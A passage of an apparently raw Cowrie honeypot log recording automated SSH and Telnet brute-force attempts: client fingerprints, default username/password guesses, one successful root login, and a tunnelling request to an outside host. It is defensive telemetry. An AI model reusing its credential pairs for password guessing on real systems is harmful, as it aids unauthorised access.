oup17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:49:37.893745Z","src_ip":"171.243.150.245","session":"0cdce7f83231"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:49:38.728692Z","src_ip":"171.243.150.245","session":"0cdce7f83231"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:49:39.957847Z","src_ip":"171.243.150.245","session":"0cdce7f83231"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:49:42.245849Z","src_ip":"171.243.150.245","session":"4f97b35b0901"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:49:42.528646Z","src_ip":"171.243.150.245","session":"4f97b35b0901"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-28T00:49:43.280202Z","src_ip":"171.243.150.245","session":"4f97b35b0901"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:49:44.529015Z","src_ip":"171.243.150.245","session":"4f97b35b0901"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55791,"dst_ip":"1.2.3.4","dst_port":23,"session":"38951f9d6720","protocol":"telnet","message":"New connection: 212.227.235.229:55791 (1.2.3.4:23) [session: 38951f9d6720]","sensor":"my-vps","timestamp":"2025-08-28T00:50:00.031901Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":22710,"dst_ip":"1.2.3.4","dst_port":22,"session":"244518b79e4f","protocol":"ssh","message":"New connection: 212.227.125.160:22710 (1.2.3.4:22) [session: 244518b79e4f]","sensor":"my-vps","timestamp":"2025-08-28T00:50:05.609659Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:50:05.610786Z","src_ip":"212.227.125.160","session":"244518b79e4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23015,"dst_ip":"1.2.3.4","dst_port":22,"session":"4695056a5932","protocol":"ssh","message":"New connection: 212.227.125.160:23015 (1.2.3.4:22) [session: 4695056a5932]","sensor":"my-vps","timestamp":"2025-08-28T00:50:05.725913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:50:05.726982Z","src_ip":"212.227.125.160","session":"4695056a5932"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T00:50:05.843272Z","src_ip":"212.227.125.160","session":"4695056a5932"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:50:06.193736Z","src_ip":"212.227.125.160","session":"4695056a5932"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T00:50:06.314933Z","session":"4695056a5932"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44273,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed49e3e2c372","protocol":"ssh","message":"New connection: 212.227.125.160:44273 (1.2.3.4:22) [session: ed49e3e2c372]","sensor":"my-vps","timestamp":"2025-08-28T00:50:06.818208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:50:06.819413Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:50:06.899543Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn","message":"login attempt [vpn/vpn] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:07.309757Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"1234","message":"login attempt [vpn/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:08.392146Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"123456","message":"login attempt [vpn/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:09.474757Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"abc123","message":"login attempt [vpn/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:10.557326Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"abcd123","message":"login attempt [vpn/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:11.653427Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:50:12.746539Z","src_ip":"212.227.125.160","session":"ed49e3e2c372"}
{"eventid":"cowrie.session.closed","duration":12.813689231872559,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:50:12.845495Z","src_ip":"212.227.235.229","session":"38951f9d6720"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49992,"dst_ip":"1.2.3.4","dst_port":22,"session":"819708ccccb0","protocol":"ssh","message":"New connection: 212.227.125.160:49992 (1.2.3.4:22) [session: 819708ccccb0]","sensor":"my-vps","timestamp":"2025-08-28T00:50:24.651444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:50:24.664068Z","src_ip":"212.227.125.160","session":"819708ccccb0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:50:24.887804Z","src_ip":"212.227.125.160","session":"819708ccccb0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin01","message":"login attempt [admin/admin01] failed","sensor":"my-vps","timestamp":"2025-08-28T00:50:27.315305Z","src_ip":"212.227.125.160","session":"819708ccccb0"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:50:28.587909Z","src_ip":"212.227.125.160","session":"819708ccccb0"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":55438,"dst_ip":"1.2.3.4","dst_port":22,"session":"a37893b42923","protocol":"ssh","message":"New connection: 171.243.150.245:55438 (1.2.3.4:22) [session: a37893b42923]","sensor":"my-vps","timestamp":"2025-08-28T00:50:54.789093Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":48830,"dst_ip":"1.2.3.4","dst_port":22,"session":"793884308d45","protocol":"ssh","message":"New connection: 194.233.79.134:48830 (1.2.3.4:22) [session: 793884308d45]","sensor":"my-vps","timestamp":"2025-08-28T00:50:54.873114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:50:54.890815Z","src_ip":"171.243.150.245","session":"a37893b42923"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:50:55.135550Z","src_ip":"194.233.79.134","session":"793884308d45"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:50:55.145908Z","src_ip":"171.243.150.245","session":"a37893b42923"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:50:55.489445Z","src_ip":"194.233.79.134","session":"793884308d45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60254,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f98dd6e1972","protocol":"ssh","message":"New connection: 212.227.125.160:60254 (1.2.3.4:22) [session: 7f98dd6e1972]","sensor":"my-vps","timestamp":"2025-08-28T00:50:55.725068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:50:55.740476Z","src_ip":"212.227.125.160","session":"7f98dd6e1972"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes1